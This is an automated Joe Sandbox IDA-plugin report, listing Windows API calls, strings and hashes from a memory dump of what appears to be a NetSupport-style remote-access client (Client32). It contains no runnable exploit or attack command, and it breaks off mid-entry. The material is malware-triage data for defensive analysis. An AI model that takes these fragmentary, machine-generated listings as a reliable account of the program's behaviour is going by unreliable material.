                                                                                            • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                            • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,F3EE1E80,?,00000000,00000000), ref: 1100AC84
                                                                                            • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                            • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                            • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                            • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                            • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                            • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                            • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                          • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,F3EE1E80,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                          • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                          • _calloc.LIBCMT ref: 1100B3E9
                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                          • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                          • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                          Strings
                                                                                          • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                          • Audio, xrefs: 1100B347
                                                                                          • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                          • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                          • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                          • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                          • DisableSounds, xrefs: 1100B342
                                                                                          • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                          • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                          • API String ID: 1843377891-2362500394
                                                                                          • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                          • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                          • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                          • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                          APIs
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                          • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                          • _fgets.LIBCMT ref: 1102B3C0
                                                                                          • _strtok.LIBCMT ref: 1102B3E8
                                                                                            • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                          • _fgets.LIBCMT ref: 1102B424
                                                                                          • _strtok.LIBCMT ref: 1102B438
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                          • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                          • API String ID: 78526175-1484737611
                                                                                          • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                          • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
                                                                                          • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                          • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                          APIs
                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,F3EE1E80,00000000,00000000,00000000), ref: 1103119A
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                          • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                          • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                            • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                            • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                            • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                            • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                            • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                            • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                          • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                          • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                          • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                          • API String ID: 3887438110-1852639040
                                                                                          • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                          • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                          • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                          • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                          APIs
                                                                                            • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                            • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                            • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                          • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                          • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                          • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                          • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                          • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                          • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                          • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                          • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                          • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                          • String ID: AddToJournal$Chat
                                                                                          • API String ID: 693070851-2976406578
                                                                                          • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                          • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                          • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                          • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 1110534D
                                                                                          • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                          • GetTickCount.KERNEL32 ref: 1110535C
                                                                                          • GetTickCount.KERNEL32 ref: 1110538E
                                                                                          • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                          • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                          • GetTickCount.KERNEL32 ref: 111053EC
                                                                                          • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                          • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                          • API String ID: 831250470-625438208
                                                                                          • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                          • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                          • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                          • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                          APIs
                                                                                          • GetVersion.KERNEL32(00000000,75920BD0,00000000), ref: 11137363
                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                          • _memset.LIBCMT ref: 111373D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc$Version_memset
                                                                                          • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                          • API String ID: 1659045089-3162170060
                                                                                          • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                          • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                          • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                          • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                          • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                          • _memset.LIBCMT ref: 11039131
                                                                                          • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                          • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                          • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                          • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                          • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                          • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                            • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                            • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                          • String ID:
                                                                                          • API String ID: 3085755443-3916222277
                                                                                          • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                          • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                          • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                          • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 1106F397
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeavewsprintf
                                                                                          • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                          • API String ID: 3005300677-3496508882
                                                                                          • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                          • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                          • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                          • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 11047211
                                                                                          • _malloc.LIBCMT ref: 110472AD
                                                                                          • _memmove.LIBCMT ref: 11047312
                                                                                          • SendMessageTimeoutA.USER32(?,0000004A,000404A0,00000005,00000002,00002710,?), ref: 11047372
                                                                                          • _free.LIBCMT ref: 11047379
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                            • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                            • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                            • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                            • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                            • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
